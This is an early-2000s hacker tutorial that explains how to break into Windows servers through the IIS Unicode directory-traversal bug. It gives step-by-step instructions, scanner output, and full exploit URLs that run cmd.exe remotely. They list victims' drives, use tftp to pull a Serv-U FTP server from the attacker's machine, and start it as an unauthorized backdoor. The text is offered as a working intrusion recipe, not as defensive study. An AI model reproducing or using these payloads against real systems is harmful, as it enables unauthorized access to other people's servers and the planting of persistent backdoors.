~=Making a dump=~

Tools

-         PC with win* OS

-         IE explorer

-         Exploiter ( bug scaner )

-         Tftp32

-         A brain ( i don’t know where u can buy it )

-         Serv-u ( with a user created with full acces to all dirves )

 

 

Part 1

 

Run exploiter for scan ip ranges

 

     

 

in the text box IP inicio/Fichero (ip start) u have to set the first ip of the range to scan and in the text box IP final the last ip to scan. In the example i typed 123.255.255.1 & 123.255.255.255, set the timeout to 10 and press empezar ( start ), to stop the scan press start again

 

 

 

in the example, we found a server with iis bug and 3 hdds

01/02/2002   16:28:51   IP: 123.255.255.24  Bug: /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Unidad: C  0,81 GB. libres

------------------------------------------------------------------------

01/02/2002   16:28:54   IP: 123.255.255.24  Bug: /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Unidad: E  1,30 GB. libres

------------------------------------------------------------------------

01/02/2002   16:28:56   IP: 123.255.255.24   Bug: /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Unidad: G  1,08 GB. libres

 

 

Part 2

 

Ok, let’s to see the contents of the  disc drives, open internet explorer and type

 

http://server's_ip/bug+dir+unit ( http://123.255.255.24/_vti_bin/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir+c:\ )

 

if  ie shows the content of the unit, u can execute basic command of msdos J ( dir, delete, md... )

 

now execute Tftpd32

 

 

use the browser to set the folder with the files of serv-u ( serv-u.exe & serv-u.ini )

 

and now.... in ie execute this command

c:\winnt\system32\tftp.exe+-i+YOUR_IP+GET+File_in_your_pc+File_Remote

(http://123.255.255.24/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+- i+213.4.15.31+GET+serv-u.exe+c:\winnt\system32\serv-u.exe)

 

change 213.4.15.31 per your ip, serv-u.exe per the serv-u executable name and c:\winnt\system32\serv-u.exe per the path where u want to upload the file

 

 

 

 

if the server leaves u upload via tftp, u can upload serv-u.ini & serv-u.exe

 

and now u only need run the ftp server with:

http://123.255.255.24/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+c:\winnt\system32\serv-u.exe+ c:\winnt\system32\serv-u.ini

 

if u followed all the instructions, now u can acces to the server via ftp.

 

 

BlooD2k2